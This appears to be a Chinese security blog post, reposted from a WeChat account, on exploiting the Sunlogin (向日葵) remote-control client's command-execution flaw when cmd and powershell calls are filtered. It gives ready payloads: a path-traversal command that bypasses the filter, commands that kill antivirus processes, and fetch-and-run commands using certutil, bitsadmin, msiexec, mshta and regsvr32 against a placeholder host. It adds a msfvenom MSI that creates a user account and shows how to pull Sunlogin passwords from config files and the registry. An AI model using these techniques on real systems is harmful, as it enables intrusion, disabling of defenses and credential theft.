向日葵漏洞思考

admin
admin
admin
144121
文章
118
评论
2022年3月5日11:28:05评论0 views字数 1916阅读6分23秒阅读模式
漏洞爆发很久了,有些时候cmd和powershell不允许进行调用之类的,今天也是因为项目中出现了,尝试了一下,写一下总结吧。
0x01 背景

向日葵漏洞思考

向日葵漏洞思考

有两个环境是上图这样的,后面也是成功执行命令拿到权限了,但是感觉有很多方法。
0x02 可能的方法

0x001 第一种方法

添加管道符即可,绕过匹配的规则

ping../../../../../../../../../windows/system32/cmd.exe+/c|cmd+/c+whoami

向日葵漏洞思考

0x002 第二种方法

得知向日葵默认是system权限,那就可以直接去taskkill杀软了 (比较残忍,还得防止自启之类)

ping../../../../../../../../../windows/system32/taskkill+/f+/pid+1111

向日葵漏洞思考

然后再去执行命令之类的,就比较方便了

向日葵漏洞思考

0x003 第三种方法

可以调用其他远程下载的system32下的exe,这里简单介绍下(过杀软需自测)

certutil

直接用certutil去下载exe文件执行
certutil -urlcache -split -f http://x.x.x.x/only.execmd.exe /c only.exe
注:
缓存目录为
%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

向日葵漏洞思考

向日葵漏洞思考

bitsadmin

bitsadmin /transfer n http://x.x.x.x/1.txt C:Usersf0ngf0ng\1.txt

向日葵漏洞思考

这里可能需要iis服务器

IEexec

#在攻击机器上生成msi包 msfvenom -p windows/exec CMD='net user only onlysecurity /add' -f msi > evil.msi #在目标机器上远程执行(直接写payload的ip和文件) msiexec /q /i http://x.x.x.x/evil.msi

向日葵漏洞思考

向日葵漏洞思考

mshta

mshta用于执行.hta文件,而hta是HTML Applocation的缩写,也就是HTML应用程序。
而hta中也支持VBS。所以我们可以利用hta来下载文件。
mshta http://x.x.x.x/run.hta

向日葵漏洞思考

向日葵漏洞思考

regsvr32

Regsvr32命令用于注册COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行
regsvr32.exe /u /n /s /i:http://x.x.x.x/1.sct scrobj.dll

向日葵漏洞思考

向日葵漏洞思考

wmic

比如也可以调用wmic去停止杀软进程等等

ping../../../../../../../../../windows/system32/wbem/wmic+process+where+name%3d'360TRAY.exe'+call+terminate

向日葵漏洞思考

0x004 第四种方法

已知是向日葵了,那么就去读取配置文件
安装版:
C:Program FilesOraySunLoginSunloginClientconfig.ini
便携版:
C:ProgramDataOraySunloginClientconfig.ini
目前最新版密码已经不在配置文件中但是可以通过注册表进行查询,目前解密脚本仍可以用
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInfo
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo
reg存在于C:/windows/system32下,所以可以直接使用

向日葵漏洞思考

向日葵漏洞思考

直接连接

向日葵漏洞思考

0x04 总结

1.在出现漏洞以后,杀软肯定会更新规则,在那之后,怎么绕过防护,利用漏洞是值得去思考的 。
2.有些小知识在漏洞之间可能是相通的,比如这里通过调用exe去进行深入利用。
3.一些可能泄露账号密码的程序,比如向日葵、finalshell之类的配置文件可以收集起来,在这里漏洞点如果只能读取文件的时候,也可以进行深入利用。

参考链接:

https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/

https://www.cnblogs.com/xiaozi/p/12721960.html

https://github.com/wafinfo/Sunflower_get_Password

原文始发于微信公众号(only security):向日葵漏洞思考

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月5日11:28:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   向日葵漏洞思考http://cn-sec.com/archives/817670.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息